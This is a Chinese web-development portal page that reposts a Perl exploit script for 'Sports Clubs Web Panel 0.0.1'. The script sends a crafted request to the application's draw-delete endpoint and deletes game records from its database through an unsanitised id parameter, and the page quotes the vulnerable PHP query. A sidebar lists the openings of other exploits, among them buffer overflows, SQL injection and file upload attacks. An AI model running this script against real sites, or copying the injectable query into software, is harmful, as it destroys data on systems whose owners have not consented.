首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络安全
Exploit
正文
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
所属分类:
网络安全
/
Exploit
阅读数: 196
收藏 0
赞 0
分享
#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__
更多精彩内容
其他人还在看
Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
<a name="upload-file"></a><h2>WORDPRESS PLUGIN DOWNLOAD MANAGER 0.2 REMOTE FILE UPLOAD</h2> <h3>S
评论 0
收藏 0
赞 0
分享
PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
<?php //////////////////////////////////////////////////////////////////////// // _ _ _
评论 0
收藏 0
赞 0
分享
FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrin
评论 0
收藏 0
赞 0
分享
Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # #
评论 0
收藏 0
赞 0
分享
NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field b
评论 0
收藏 0
赞 0
分享
MS Internet Explorer Recordset Double Free Memory Exploit
<HTML> <!-- ********************************************************************************** Microsoft Internet Explo
评论 0
收藏 0
赞 0
分享
Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for wi
评论 0
收藏 0
赞 0
分享
Linux Kernel
/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw w
评论 0
收藏 0
赞 0
分享
MS Internet Explorer (FTP Server Response) DoS Exploit
#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.0290
评论 0
收藏 0
赞 0
分享
MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystia
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
90后网络爆红美女卖"毒面膜" 年收入超七位数
抢孩子谣言发布者究竟是谁?运营80余公众号造谣吸粉月赚20万
Google
第三次零售革命 - 智慧零售
谷歌广告怎么收款?光大银行需要携带资料到柜台办理
六一儿童节微营销秘籍 互动吸粉6大招
站长故事
更多
站长故事:一个80后妈妈的微商之旅
30岁seo老鸟走过的路:从无知到精通需要时间和精力
浅谈:一个草根站长的服装论坛赚钱经验
PHPWind
人物:戴志康,80后创业者携惊叹号而来
如何让自己的网站流量暴增并增加成交率